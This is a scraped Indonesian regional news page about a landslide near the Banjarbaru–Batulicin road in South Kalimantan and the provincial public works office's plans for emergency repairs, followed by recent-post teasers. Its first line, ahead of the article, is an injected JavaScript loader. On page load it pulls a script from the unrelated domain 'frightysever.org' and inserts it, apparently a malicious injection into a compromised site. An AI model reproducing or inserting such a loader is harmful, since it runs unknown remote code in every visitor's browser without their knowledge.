(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PUPR PROV KALSEL

Jalan Banjarbaru – Batulicin Longsor, Dinas PUPR Kalsel Segera Lakukan Ini


KANALKALIMANTAN.COM, MARTAPURA – Tingginya intensitas hujan di Kalimantan Selatan dalam beberapa minggu terakhir mengakibatkan longsor di dekat jalan Banjarbaru – Batulicin.

Menindaklanjuti longsor pada jalan Banjarbaru – Batulicin itu, Pemerintah Provinsi Kalimantan Selatan (Kalsel) melalui Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Kalsel langsung melakukan peninjauan ke lapangan.

Peninjauan ke lokasi langsung dipimpin Kepala Dinas PUPR Kalsel Ahmad Solhan diwakili oleh Kabid Bina Marga Azan Syariful Muaz bersama Kepala Seksi Pembinaan Teknis Jalan dan Jembatan Dedi Hidayat dan Kepala Seksi Jalan Handa Ferani.

Baca juga: Mengintip Persiapan Imlek 2575 Klenteng Soetji Nurani Banjarmasin

Dalam kesempatannya, Azan Syariful Muaz mengatakan peninjauan ke lokasi dilakukan guna menangani potensi kelongsoran yang tidak hanya terjadi di satu titik, melainkan juga di beberapa tempat lain.

“Potensi kelongsoran ini sebenarnya sudah diprediksi. Namun, belum melakukan penanganan secara menyeluruh,” kata Kabid Bina Marga, Senin (5/2/2024).

Dalam upayanya memperbaiki akses jalan tersebut, kata Azan, Dinas PUPR Kalsel telah mengalokasikan anggaran untuk pemeliharaan jalan yang sudah dibangun dan akan ditangani secepat mungkin.

Baca juga: Saidi Mansyur Sambut Hangat Rombongan Bupati Tanjung Jabung Kunker ke Martapura

“Sebagai langkah awal, kami akan segera menindaklanjuti permasalahan longsor tersebut dan melakukan penanganan darurat sebelum melakukan penanganan menyeluruh,” ujar dia.

Selain itu, PUPR Kalsel juga akan melakukan inventarisasi potensi-potensi di tempat-tempat lain agar tidak terjadi peristiwa serupa di lain waktu.

Hal ini, jelas dia, membuktikan bahwa pihaknya memperhatikan dan berkomitmen untuk memperbaiki infrastruktur di Kalsel secara menyeluruh dan bertahap.

Baca juga: Kepala SKPD Pemko Banjarbaru Tandatangani Perjanjian Kinerja

“Memang ruas jalan Banjarbaru – Batulicin belum sepenuhnya lengkap penanganannya baik dari pinggir jalan, pagar, rambu-rambu jalan, pengamanan tebing, dan lainnya. Kami ingin jalan ini tembus dulu,” ungkap dia.

Oleh karena itu, Dinas PUPR Kalsel akan terus berjuang agar akses jalan di daerah tersebut semakin membaik dan memudahkan pengguna jalan.

Maka diharapkan dengan upaya yang dilakukan oleh Dinas PUPR Kalsel ini, akses jalan di daerah tersebut dapat semakin membaik dan memudahkan mobilitas dan distribusi logistik.

Baca juga: Sekda Septedy Apresiasi Event Kapuas Run 2024

“Seiring dengan komitmen semua pihak, kita sebagai pengguna jalan wajib bergandengan tangan untuk menjaga, merawat dan memperhatikan jalan yang ada agar tetap kondusif dan aman untuk digunakan,” katanya. (kanalkalimantan.com/mckalsel/kk)

Reporter: kk

Editor: Dhani


Muhammad Andi

Recent Posts

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

32 menit ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

40 menit ago

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

16 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

17 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

18 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

19 jam ago

This website uses cookies.